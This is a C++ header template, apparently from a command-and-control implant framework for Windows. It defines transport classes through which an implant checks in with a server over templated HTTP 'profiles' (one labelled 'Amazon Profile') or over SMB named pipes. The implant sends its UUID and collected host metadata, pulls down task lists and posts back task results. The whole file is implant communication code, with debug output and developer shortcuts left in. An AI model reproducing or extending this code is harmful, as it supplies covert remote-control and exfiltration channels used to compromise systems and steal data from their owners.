#pragma once
#include <windows.h>
#include <string>
#include <vector>
#include "protocols/json/json.h"
#include "core/settings.h"
#include "comms/smb.h"
#include <optional>
#include "modules/metadata.h"
#include "comms/queues.h"
#include "comms/comms.h"
// ==========================================================
// BASE INTERFACES
// ==========================================================

//base class to derive each transport method off of. tldr, it's more boilerplate code to do this,
// but makes it easier IMO to track/structure. 
class IIngressTransport {
public:
	virtual ~IIngressTransport() = default;
	// our "sleep" function, or what to wait for. 
	// Universal for a sleep time, or someting like a pipe that waits
	virtual HANDLE get_wait_handle() = 0;
	//func to get our task
	virtual nlohmann::json create_get_request(const std::string& uuid, bool full_metadata = false) = 0;
    virtual nlohmann::json get(std::string implant_uuid) = 0; 
    //protected = only members/children can use
protected:
    std::vector<uint8_t> pack_to_msgpack(const nlohmann::json& json_data) {
        return nlohmann::json::to_msgpack(json_data);
    }

    nlohmann::json unpack_to_json(const std::vector<uint8_t> msgpack_data) {
        try {
            nlohmann::json result = nlohmann::json::from_msgpack(msgpack_data);
            return result;
        }
        catch (nlohmann::json::parse_error& e) {
            std::cerr << "JSON Parse Error: " << e.what() << std::endl;
            std::cerr << "Byte position of error: " << e.byte << std::endl;

            // PRINT THE RAW HEX to see what you actually received
            std::cerr << "Raw Buffer (Hex): ";
            for (auto byte : msgpack_data) {
                printf("%02X ", (unsigned char)byte);
            }
            std::cout << std::endl;

            return nlohmann::json(); // Return null json to prevent crash
        }
    }
};

class IEgressTransport {
public:
	virtual ~IEgressTransport() = default;
	//func to send response
	virtual void send_response(const std::string& uuid, const nlohmann::json& task_response_array) = 0;

protected:
    std::vector<uint8_t> pack_to_msgpack(const nlohmann::json& json_data) {
        return nlohmann::json::to_msgpack(json_data);
    }

};

// ==========================================================
// 2. HTTP IMPLEMENTATIONS (Amazon Profile)
// ==========================================================

// Forward declarations of GET functions from comms.cpp

[%- for c2_get_profile in get_function_mappings.values() %]

std::vector<uint8_t> [[ c2_get_profile.value]]::get(std::vector<uint8_t> metadata_as_msgpack);

[%- endfor %]

// Forward declarations of POST functions from comms.cpp

[%- for c2_post_profile in post_function_mappings.values() %]

int [[ c2_post_profile.value]]::post(std::string implant_uuid, std::vector<uint8_t> task_response_msgpack_list);

[%- endfor %]


//Declare classes for each comms type

[%- for c2_get_profile in get_function_mappings.values() %]

class [[ c2_get_profile.value ]]_class : public IIngressTransport {
public:
    //return NULL on non pipe/handle returning transport methods.
    //parent loop handles this by reverting to a wait for single, which waits
    //for the worker.
    HANDLE get_wait_handle() override {
        return NULL;
    }

	nlohmann::json create_get_request(const std::string& uuid, bool full_metadata = false) override {
        /*
        Creates the get task for THIS implant. 
        
        */

        //Note - moved logic of msgpack/metadata to this, instead of inside of each transport
        //method. This keeps everythign cleaner/less tied together
        nlohmann::json metadata = nlohmann::json();
        std::vector<uint8_t> metadata_as_msgpack;

        //if we want to include full metdata
        if (full_metadata) {
            metadata = populate_metadata();
        }
        //add implant uuid to data
        metadata["implant_uuid"] = uuid;
        return metadata;

	}
    nlohmann::json get(std::string implant_uuid) {
        /*
        Gathers all queued GET requests, and yeets them off to the server in an
        array.

        Then, we get the task array back, and return them.
        
        */
        //get all items in queue for sending back to server
        nlohmann::json get_array = GetQueue::drain_queue();

        //check if we are registered. if not, include metadata
        bool populate_this_implants_metadata = true; //temp enable, settings ebing dumb
        //if (SettingsManager::instance().get<int>("registered", 1) != 1) {
        //    bool populate_this_implants_metadata = true;
        //}

        //add our own checkin here
        nlohmann::json this_implants_get = this->create_get_request(implant_uuid, populate_this_implants_metadata);
        get_array.push_back(this_implants_get);

        std::cout << "CHECKIN DATA -> SERVER" << std::endl;
        std::cout << get_array.dump(4) << std::endl;

        //to msgpack
        std::vector<uint8_t> get_as_msgpack;
        get_as_msgpack = this->pack_to_msgpack(get_array);

        //send checkin
        std::vector<uint8_t> response = [[ c2_get_profile.value ]]::get(get_as_msgpack);

        nlohmann::json task_array = nlohmann::json::array();
        if (!response.empty()) {
            //unpack response, add to array
            //note, don't push back, this comes in as [{},{}...]
            task_array = this->unpack_to_json(response);
        }

        return task_array;
    }

};

[%- endfor %]

[%- for c2_post_profile in post_function_mappings.values() %]

class [[ c2_post_profile.value ]]_class : public IEgressTransport {
public:
	void send_response(const std::string& uuid, const nlohmann::json& task_response_array) override {
        std::vector<uint8_t> task_response_msgpack_list = this->pack_to_msgpack(task_response_array);

		[[ c2_post_profile.value ]]::post(uuid, task_response_msgpack_list);
	}
};

[%- endfor %]


/* endtemplate */


//later
// // ==========================================================
// // 3. PIPE IMPLEMENTATIONS (SMB Profile)
// // ==========================================================

//hardcoded, for dev
class PipeIngress : public IIngressTransport {
private:
    HANDLE h_inbox_;
    HANDLE h_outbox_;

public:
    PipeIngress(HANDLE h_in, HANDLE h_out) : h_inbox_(h_in), h_outbox_(h_out) {
    }

    HANDLE get_wait_handle() override {
        return NULL;
    }

    nlohmann::json create_get_request(const std::string& implant_uuid, bool full_metadata = false) override {
        nlohmann::json metadata = nlohmann::json();
        if (full_metadata) {
            metadata = populate_metadata();
        }
        metadata["implant_uuid"] = implant_uuid;
        return metadata;
    }

    nlohmann::json get(std::string implant_uuid) override {
        nlohmann::json get_array = GetQueue::drain_queue();
        get_array.push_back(this->create_get_request(implant_uuid, true));

        std::vector<uint8_t> get_as_msgpack = this->pack_to_msgpack(get_array);

        // DELEGATE TO NAMESPACE
        std::vector<uint8_t> raw_response = SMB::Child::fetch_tasks(h_inbox_, h_outbox_, get_as_msgpack);

        if (!raw_response.empty()) {
            return this->unpack_to_json(raw_response);
        }

        return nlohmann::json();
    }
};

class PipeEgress : public IEgressTransport {
private:
    HANDLE h_outbox_;

public:
    PipeEgress(HANDLE h) : h_outbox_(h) {
    }

    void send_response(const std::string& uuid, const nlohmann::json& task_response_array) override {
        std::vector<uint8_t> batched_data = this->pack_to_msgpack(task_response_array);

        // DELEGATE TO NAMESPACE
        SMB::Child::send_data(h_outbox_, batched_data);
    }
};